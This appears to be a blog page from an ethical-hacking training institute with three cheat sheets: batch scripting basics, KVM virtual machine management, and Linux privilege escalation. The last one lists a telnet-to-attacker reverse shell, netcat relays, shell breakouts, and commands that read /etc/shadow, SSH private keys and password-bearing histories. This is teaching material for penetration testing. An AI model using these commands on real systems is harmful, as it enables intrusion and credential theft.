skip to main |
skip to sidebar
| Name |
Author |
Perms |
Com |
Modified |
Label |
| Filename |
Small Cheat Sheet for hackers on Batch Programming |
| Permission |
rw-r--r-- |
| Author |
Unknown |
| Date and Time |
11/25/2015 |
| Label |
Cheatsheet
|
| Action |
|
To start off there is the @echo off/on
and there is echo
and pause
so here is an example
Quote:
@echo off
echo Hello This is a test
pause
type this in notepad and save as test.bat
launch it
it will look like this
Quote:
Hello This is a test
Press any key to continue...
Again open notepad and write:
Quote:
@echo on
echo Hello This is a test
pause
and save it on the desktop as test2.bat
launch it , it will look like this
>
Quote:
C:\Documents and Settings\User\Desktop>echo Hello This is a test
Hello This is a test
C:\Documents and Settings\User\Desktop>pause
Press any key to continue
So for the explanation
@echo off/on:
if you put @echo on it will show the directory as you just saw
if you put @echo off it will just show the words with no directories
so its best to use @echo off
echo:
If you want to type a simple phrase just type in echo and something in this case echo Hello This is a test
which will show Hello This is a test
pause
pause will pause the batch file,if you press a key the batch will continue in this case it will exit because there is no more left
so try this
Quote:
@echo off
echo Hello This is a test
pause
echo I am testing pause
pause
This will show
Quote:
Hello This is a test
Press Any Key To Continue...
(when you press a key it will show)
I am testing a pause
Press Any key to continue..
so that convers the pause command
Now some more commands
there is msg *
and there is cls
open notepad and write:
Quote:
@echo off
echo Hello This is a test
pause
cls
echo I am testing pause
msg * The End
pause
and save as test3.bat
This will show
Quote:
Hello This is a test
Press Any Key To Continue...
(when you press a key it will show)
cls
(the page will clear)
I am testing a pause
(a pop-up will show saying The End)
Press Any key to continue..
So .. cls will just clear the screen
and msg * will bring up a pop-up:D
other commands are REM and goto and start
so create a folder name it Test
put any picture inside and name it testpic
open notepad and type
Quote:
@echo off
echo Testing start and rem
rem title Test
start testpic.jpg (or any other extension)
pause
and save it inside the new folder as test4.bat
launch it , it will show:
Quote:
Testing start and rem
Press Any Key To Continue
(and the picture will launch)
so start will launch any file
and rem is a remark.. which wont show in the bat file when running
now the goto and set and if
type this inside notepad
Quote:
@echo off
echo This is a test
echo If you want to do math type 1 and press enter
echo If you want to see a picture type 2 and press enter
set /p option=
if '%option%'=='1' goto :math
if '%option%'=='2' start testpic.jpg (or any extension)
:math
echo 2+2
pause
and save it inside the new folder
this will show
Quote:
This is a test
If you want to do math type 1 and press enter
if you want to see a picture type 2 and press enter
(here you can type 1 or 2 and press enter)
(if you press 2 and Enter the picture will load)
(if you press 1 and enter this will show up):
2+2
Press any key to continue...
so goto will go to a Label or a Part of the file
when you put :Math
a new label will be named Math and when you put goto :math
the batch will go to :math
set
the set option will set something :D.. here its going to set :choice
the set is , in some options followed by if
so if I type 1 in this example
the "choice" will be 1 .. and it will go to :math because we put
if '%choice%'=='1' goto :math
so if we put 1 the choice will be 1 therefore it will goto :math
i am going to talk about call,exit,and SHIFT?
go into notepad and type this
Quote:
@echo off
echo yay me i know the basics of batch
call call.bat
pause
exit
and save in a new folder:)
then open note pad and type this again
Quote:
@echo off
echo I Love hacking
pause
and save in the same folder that you save the last one... and name it call.bat
launch the first one
this will show
Quote:
yay me i know the basics of batch
I Love hacking
Press Any Key To Continue....
(when you press a key the below will appear)
Press Any Key To Continue...
and when you press a key it will exit
ok.. so now you know what exit does.. it exits the file Imao
and call ,calls in another batch file!!..
so now for SHIFT which is a little hard so try to understand
SHIFT [/n]
If Command Extensions are enabled the SHIFT command supports the /n switch which tells the command to start shifting at the nth argument, where n euh.. can be between zero and eight.
just like this 1 below
SHIFT /2
would shift %3 to %2, %4 to %3, etc. and leave %0 and %1 ..euh.. how can i say it.. .:S.. unaffected yea thats the word .
Examples
the below has got to be saved as .bat.. so just name it test:)
@ECHO OFF
ECHO - %1
SHIFT
ECHO - %1
After creating the above example test.bat file, if you were to type the below command at the MS-DOS prompt, it would print "- ONE" and then "- TWO"; this command is commonly used to work through each of the command extensions or remove command extensions.
(SHIFT , i mean the explanation... i got it from a website and edited it)
Ok I hope you understand
ok thats it for now.. ill post a Batch Features Later
Hello... please read the 2 tutorials before i will talk in this one about a lot of features here we go!:D..
first we will learn how to launch windows applications:
type in notepad:
Quote:
@echo off
echo I am testing notepad!
start /MIN notepad
pause
This will show
Quote:
i am testing notepad
(and notepad will start minimized.. if you put /MAX instead of /MIN it will launch maximized)
Press Any Key To Continue
Now lets learn how to put a timeout inside a batch..
goto notepad and type:
Quote:
@echo off
echo i am trying timeout
set wait=0
:pause1
set /a wait=%wait%+1
if %wait% leq 1000 goto pause1
echo IT WORKED!\
pause
dont understand the command.. just copy paste it.. or memorize it .. if i tell you the explanation it will take years!!..
so this will show :
Quote:
i am trying timeout
(couple of seconds and.. )
Press Any Key To Continue...
Now ill teach you how to change the TIME
goto notepad and type:
Quote:
@echo off
echo Gee!.. i wonder what time it is!!
TIME 5:50
echo Oh so its 5:50
pause
this will show:
Quote:
Gee!.. i wonder what time its is!!
Oh so its 5:50
The TIME will just change The TIME:PImao
Now the Color
go into notepad and type this
Quote:
@echo off
echo trying the colors
pause
color 04
echo testing
pause
color f
echo trying
pause
color 4f
echo trying
pause
04=background black and font red
f the font will be white
4f = background red and f = white
Here are the list(that can be found by cmd>color help)
0=black
1=blue
2=green
3=aqua
4=red
5=purple
6=yellow
7=white
8=gray
9=light blue
a=light green
b=light aqua
c=light red
d=light purple
e=light yellow
f=bright white
So this will show Imao
i wont tell try it!!.:P
now the title
type this in notepad
Quote:
@echo off
tile Test
echo trying the title
pause
this will show the title Test When you launch it!!
lets try Shutdown/Restart
type this in Notepad
Quote:
@echo off
START C:\Windows\RUNDLL.EXE user.exe,exitwindowsexec
exit
The above will restart
Quote:
@echo off
Shut down the computer
C:\Windows\RUNDLL32.EXE user,exitwindows
exit
The Above will Shutdown
Enjoy!!!
www.extremehacking.org
CEHv9 CHFI ECSAv9 CAST ENSA CCNA CCNA SECURITY MCITP RHCE CHECKPOINT ASA FIREWALL VMWARE CLOUD ANDROID IPHONE NETWORKING HARDWARE TRAINING INSTITUTE IN PUNE, Certified Ethical Hacking, Center For Advanced Security Training in India, IT Security Training Information Security Traning Courses in Pune, ceh certification in pune, Ethical Hacking Course in Pune
| Filename |
Virtual Machine Adding Memory Cheatsheet |
| Permission |
rw-r--r-- |
| Author |
Unknown |
| Date and Time |
11/09/2015 |
| Label |
Cheatsheet
|
| Action |
|
Extreme Hacking | Sadik Shaikh
Ethical Hacking Institute Course in Pune-India
This tutorial will explain how to perform the following Linux KVM VM activities:
Add Memory to VM
Add vCPU to VM
Add Disk to VM
Save VM Configuration
Delete a VM
1. Add Memory to Virtual Machine
To add additional memory to your VM, you should do the following:
Shutdown your VM
Edit the VM file and increase the value of maximum memory allocated to this VM
Restart the VM
Use virsh setmem to set the memory upto the maximum memory allocated for this VM.
In this example, let us increase the memory of myRHELVM1’s VM from 2GB to 4GB.
First, shutdown the VM using virsh shutdown as shown below:
# virsh shutdown myRHELVM1
Domain myRHELVM1 is being shutdown
Next, edit the VM using virsh edit:
# virsh edit myRHELVM1
Look for the below line and change the value for memory to the following. In my example, earlier it was 2097152:
<memory unit='KiB'>4194304</memory>
Please note that the above value is in KB. After making the change, save and exit:
# virsh edit myRHELVM1
Domain myRHELVM1 XML configuration edited.
Restart the VM with the updated configuration file. Now you will see the max memory increased from 2G to 4G.
You can now dynamically modify the VM memory upto the 4G max limit.
Create the Domain XML file using virsh create
# virsh create /etc/libvirt/qemu/myRHELVM1.xml
Domain myRHELVM1 created from /etc/libvirt/qemu/myRHELVM1.xml
View the available Memory for this domain. As you see below, even though the maximum available memory is 4GB, this domain only has 2GB (Used memory).
# virsh dominfo myRHELVM1 | grep memory
Max memory: 4194304 KiB
Used memory: 2097152 KiB
Set the memory for this domain to 4GB using virsh setmem as shown below:
# virsh setmem myRHELVM1 4194304
Now, the following indicates that we’ve allocated 4GB (Used memory) to this domain.
# virsh dominfo myRHELVM1 | grep memory
Max memory: 4194304 KiB
Used memory: 4194304 KiB
2. Add VCPU to VM
To increase the virtual CPU that is allocated to the VM, do virsh edit, and change the vcpu parameter as explained below.
In this example, let us increase the memory of myRHELVM1’s VM from 2GB to 4GB.
First, shutdown the VM using virsh shutdown as shown below:
# virsh shutdown myRHELVM1
Domain myRHELVM1 is being shutdown
Next, edit the VM using virsh edit:
# virsh edit myRHELVM1
Look for the below line and change the value for vcpu to the following. In my example, earlier it was 2.
<vcpu placement='static'>4</vcpu>
Create the Domain XML file using virsh create
# virsh create /etc/libvirt/qemu/myRHELVM1.xml
Domain myRHELVM1 created from /etc/libvirt/qemu/myRHELVM1.xml
View the virtual CPUs allocated to this domain as shown below. This indicates that we’ve increased the vCPU from 2 to 4.
# virsh dominfo myRHELVM1 | grep -i cpu
CPU(s): 4
CPU time: 21.0s
3. Add Disk to VM
In this example, we have only two virtual disks (vda1 and vda2) on this VM.
# fdisk -l | grep vd
Disk /dev/vda: 10.7 GB, 10737418240 bytes
/dev/vda1 * 3 1018 512000 83 Linux
/dev/vda2 1018 20806 9972736 8e Linux LVM
There are two steps involved in creating and attaching a new storage device to Linux KVM guest VM:
First, create a virtual disk image
Attach the virtual disk image to the VM
Let us create one more virtual disk and attach it to our VM. For this, we first need to create a disk image file using qemu-img create command as shown below.
In the following example, we are creating a virtual disk image with 7GB of size. The disk images are typically located under /var/lib/libvirt/images/ directory.
# cd /var/lib/libvirt/images/
# qemu-img create -f raw myRHELVM1-disk2.img 7G
Formatting 'myRHELVM1-disk2.img', fmt=raw size=7516192768
To attach the newly created disk image, use the virsh attach-disk command as shown below:
# virsh attach-disk myRHELVM1 --source /var/lib/libvirt/images/myRHELVM1-disk2.img --target vdb --persistent
Disk attached successfully
The above virsh attach-disk command has the following parameters:
myRHELVM1 The name of the VM
–source The full path of the source disk image. This is the one that we created using qemu-image command above. i.e: myRHELVM1-disk2.img
–target This is the device mount point. In this example, we want to attach the given disk image as /dev/vdb. Please note that we don’t really need to specify /dev. It is enough if you just specify vdb.
–persistent indicates that the disk that attached to the VM will be persistent.
As you see below, the new /dev/vdb is now available on the VM.
# fdisk -l | grep vd
Disk /dev/vda: 10.7 GB, 10737418240 bytes
/dev/vda1 * 3 1018 512000 83 Linux
/dev/vda2 1018 20806 9972736 8e Linux LVM
Disk /dev/vdb: 7516 MB, 7516192768 bytes
Now, you can partition the /dev/vdb device, and create multiple partitions /dev/vdb1, /dev/vdb2, etc, and mount it to the VM. Use fdisk to create the partitions as we explained earlier.
Similarly to detach a disk from the guest VM, you can use the below command. But be careful to specify the correct vd* otherwise you may end-up removing wrong device.
# virsh detach-disk myRHELVM1 vdb
Disk detached successfully
4. Save Virtual Machine Configuration
If you make lot of changes to your VM, it is recommended that you save the configurations.
Use the virsh dumpxml file to take a backup and save the configuration information of your VM as shown below.
# virsh dumpxml myRHELVM1 > myrhelvm1.xml
# ls myrhelvm1.xml
myrhelvm1.xml
Once you have the configuration file in the XML format, you can always recreate your guest VM from this XML file, using virsh create command as shown below:
virsh create myrhelvm1.xml
5. Delete KVM Virtual Machine
If you’ve created multiple VMs for testing purpose, and like to delete them, you should do the following three steps:
Shutdown the VM
Destroy the VM (and undefine it)
Remove the Disk Image File
In this example, let us delete myRHELVM2 VM. First, shutdown this VM:
# virsh shutdown myRHELVM2
Domain myRHELVM2 is being shutdown
Next, destory this VM as shown below:
# virsh destroy myRHELVM2
Domain myRHELVM2 destroyed
Apart from destroying it, you should also undefine the VM as shown below:
# virsh undefine myRHELVM2
Domain myRHELVM2 has been undefined
Finally, remove any disk image file that you’ve created for this VM from the /var/lib/libvirt/images directory:
Now you can remove the disk img file under /var/lib/libvirt/images
rm /var/lib/libvirt/images/myRHELVM2-disk1.img
rm /var/lib/libvirt/images/myRHELVM2-disk2.img
www.extremehacking.org
CEHv9 CHFI ECSAv9 CAST ENSA CCNA CCNA SECURITY MCITP RHCE CHECKPOINT ASA FIREWALL VMWARE CLOUD ANDROID IPHONE NETWORKING HARDWARE TRAINING INSTITUTE IN PUNE, Certified Ethical Hacking, Center For Advanced Security Training in India, IT Security Training Information Security Traning Courses in Pune, ceh certification in pune, Ethical Hacking Course in Pune
| Filename |
Linux privilege escalation cheatsheet.. |
| Permission |
rw-r--r-- |
| Author |
Unknown |
| Date and Time |
11/08/2015 |
| Label |
Cheatsheet
|
| Action |
|
Extreme Hacking | Sadik Shaikh
Ethical Hacking Institute Course in Pune-India
Enumeration is the key.
(Linux) privilege escalation is all about:
Collect - Enumeration, more enumeration and some more enumeration.
Process - Sort through data, analyse and prioritization.
Search - Know what to search for and where to find the exploit code.
Adapt - Customize the exploit, so it fits. Not every exploit work for every system "out of the box".
Try - Get ready for (lots of) trial and error.
Operating System
What's the distribution type? What version?
cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release
cat /etc/redhat-release
What's the Kernel version? Is it 64-bit?
cat /proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-
What can be learnt from the environmental variables?
cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set
Is there a printer?
lpstat -a
Applications & Services
What services are running? Which service has which user privilege?
ps aux
ps -ef
top
cat /etc/service
Which service(s) are been running by root? Of these services, which are vulnerable - it's worth a double check!
ps aux | grep root
ps -ef | grep root
What applications are installed? What version are they? Are they currently running?
ls -alh /usr/bin/
ls -alh /sbin/
dpkg -l
rpm -qa
ls -alh /var/cache/apt/archivesO
ls -alh /var/cache/yum/
Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached?
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^.*r.*/
What jobs are scheduled?
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root
Any plain text usernames and/or passwords?
grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Joomla
Communications & Networking
What NIC(s) does the system have? Is it connected to another network?
/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network
What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?
cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
iptables -L
hostname
dnsdomainname
What other users & hosts are communicating with the system?
lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
last
w
Whats cached? IP and/or MAC addresses
arp -e
route
/sbin/route -nee
Is packet sniffing possible? What can be seen? Listen to live traffic
# tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]
tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.2.2.222 21
Have you got a shell? Can you interact with the system?
nc -lvp 4444 # Attacker. Input (Commands)
nc -lvp 4445 # Attacker. Ouput (Results)
telnet [atackers ip] 44444 | /bin/sh | [local ip] 44445 # On the targets system. Use the attackers IP!
Is port forwarding possible? Redirect and interact with traffic from another view
# rinetd
# fpipe
# FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP]
FPipe.exe -l 80 -r 80 -s 80 192.168.1.7
# ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]
ssh -L 8080:127.0.0.1:80 root@192.168.1.7 # Local Port
ssh -R 8080:127.0.0.1:80 root@192.168.1.7 # Remote Port
# mknod backpipe p ; nc -l -p [remote port] < backpipe | nc [local IP] [local port] >backpipe
mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.1.1.251 80 >backpipe # Port Relay
mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe # Proxy (Port 80 to 8080)
mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>backpipe # Proxy monitor (Port 80 to 8080)
Is tunnelling possible? Send commands locally, remotely
ssh -D 127.0.0.1:9050 -N [username]@[ip]
proxychains ifconfig
Confidential Information & Users
Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?
id
who
w
last
cat /etc/passwd | cut -d: # List of users
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # List of super users
awk -F: '($3 == "0") {print}' /etc/passwd # List of super users
cat /etc/sudoers
sudo -l
What sensitive files can be found?
cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/
Anything "interesting" in the home directorie(s)? If it's possible to access
ls -ahlR /root/
ls -ahlR /home/
Are there any passwords in; scripts, databases, configuration files or log files? Default paths and locations for passwords
cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg
What has the user being doing? Is there any password in plain text? What have they been edting?
cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history
What user information can be found?
cat ~/.bashrc
cat ~/.profile
cat /var/mail/root
cat /var/spool/mail/root
Can private-key information be found?
cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key
File Systems
Which configuration files can be written in /etc/? Able to reconfigure a service?
ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null # Anyone
ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null # Owner
ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null # Group
ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null # Other
find /etc/ -readable -type f 2>/dev/null # Anyone
find /etc/ -readable -type f -maxdepth 1 2>/dev/null # Anyone
What can be found in /var/ ?
ls -alh /var/log
ls -alh /var/mail
ls -alh /var/spool
ls -alh /var/spool/lpd
ls -alh /var/lib/pgsql
ls -alh /var/lib/mysql
cat /var/lib/dhcp3/dhclient.leases
Any settings/files (hidden) on website? Any settings file with database information?
ls -alhR /var/www/
ls -alhR /srv/www/htdocs/
ls -alhR /usr/local/www/apache22/data/
ls -alhR /opt/lampp/htdocs/
ls -alhR /var/www/html/
Is there anything in the log file(s) (Could help with "Local File Includes"!)
cat /etc/httpd/logs/access_log
cat /etc/httpd/logs/access.log
cat /etc/httpd/logs/error_log
cat /etc/httpd/logs/error.log
cat /var/log/apache2/access_log
cat /var/log/apache2/access.log
cat /var/log/apache2/error_log
cat /var/log/apache2/error.log
cat /var/log/apache/access_log
cat /var/log/apache/access.log
cat /var/log/auth.log
cat /var/log/chttp.log
cat /var/log/cups/error_log
cat /var/log/dpkg.log
cat /var/log/faillog
cat /var/log/httpd/access_log
cat /var/log/httpd/access.log
cat /var/log/httpd/error_log
cat /var/log/httpd/error.log
cat /var/log/lastlog
cat /var/log/lighttpd/access.log
cat /var/log/lighttpd/error.log
cat /var/log/lighttpd/lighttpd.access.log
cat /var/log/lighttpd/lighttpd.error.log
cat /var/log/messages
cat /var/log/secure
cat /var/log/syslog
cat /var/log/wtmp
cat /var/log/xferlog
cat /var/log/yum.log
cat /var/run/utmp
cat /var/webmin/miniserv.log
cat /var/www/logs/access_log
cat /var/www/logs/access.log
ls -alh /var/lib/dhcp3/
ls -alh /var/log/postgresql/
ls -alh /var/log/proftpd/
ls -alh /var/log/samba/
# auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp
If commands are limited, you break out of the "jail" shell?
python -c 'import pty;pty.spawn("/bin/bash")'
echo os.system('/bin/bash')
/bin/sh -i
How are file-systems mounted?
mount
df -h
Are there any unmounted file-systems?
cat /etc/fstab
What "Advanced Linux File Permissions" are used? Sticky bits, SUID & GUID
find / -perm -1000 -type d 2>/dev/null # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here
find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - run as the group, not the user who started it.
find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - run as the owner, not the user who started it.
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID
for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search)
# find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)
find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null
Where can written to and executed from? A few 'common' places: /tmp, /var/tmp, /dev/shm
find / -writable -type d 2>/dev/null # world-writeable folders
find / -perm -222 -type d 2>/dev/null # world-writeable folders
find / -perm -o+w -type d 2>/dev/null # world-writeable folders
find / -perm -o+x -type d 2>/dev/null # world-executable folders
find / \( -perm -o+w -perm -o+x \) -type d 2>/dev/null # world-writeable & executable folders
Any "problem" files? Word-writeable, "nobody" files
find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print # world-writeable files
find /dir -xdev \( -nouser -o -nogroup \) -print # Noowner files
Preparation & Finding Exploit Code
What development tools/languages are installed/supported?
find / -name perl*
find / -name python*
find / -name gcc*
find / -name cc
How can files be uploaded?
find / -name wget
find / -name nc*
find / -name netcat*
find / -name tftp*
find / -name ftp
More to come stay tunned.. \m/
www.extremehacking.org
CEHv9 CHFI ECSAv9 CAST ENSA CCNA CCNA SECURITY MCITP RHCE CHECKPOINT ASA FIREWALL VMWARE CLOUD ANDROID IPHONE NETWORKING HARDWARE TRAINING INSTITUTE IN PUNE, Certified Ethical Hacking, Center For Advanced Security Training in India, IT Security Training Information Security Traning Courses in Pune, ceh certification in pune, Ethical Hacking Course in Pune
